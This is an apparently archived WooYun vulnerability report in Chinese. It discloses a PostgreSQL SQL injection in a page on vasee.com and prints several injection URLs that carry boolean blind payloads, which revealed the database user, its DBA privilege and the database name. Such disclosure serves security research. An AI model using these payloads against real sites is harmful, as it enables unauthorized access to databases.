漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-070432
漏洞标题:前沿官网postgresql注射一枚
相关厂商:北京前沿同创科技有限公司
漏洞作者: 路人甲
提交时间:2014-07-31 12:51
修复时间:2014-08-05 12:52
公开时间:2014-08-05 12:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-31: 细节已通知厂商并且等待厂商处理中
2014-08-05: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
看到有人发的前沿的 敏感信息泄露上了首页,所以就看了下
详细说明:
上首页那个可能是 svn泄露源代码的
我这个是postgresql 注射
http://www.vasee.com/group/view/event/upcoming.jsp?groupid=ff808081355fdcb8013579b528870583' and length(user())=8 and 'a'='a
正常
说明用户长度为8
http://www.vasee.com/group/view/event/upcoming.jsp?groupid=ff808081355fdcb8013579b528870583' and user()='postgres' and'a'='a
正常
用户为postgre
权限是 dba
http://www.vasee.com/group/view/event/upcoming.jsp?groupid=ff808081355fdcb8013579b528870583%27and%20current_database%28%29=
%27vaseedbstable%27%20and%20%27a%27=%27a
正常
当前数据库是vaseedbstable
因为这个点 不能用注释符 盲注比较累 所以就没继续了
漏洞证明:
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-08-05 12:52
厂商回复:
最新状态:
暂无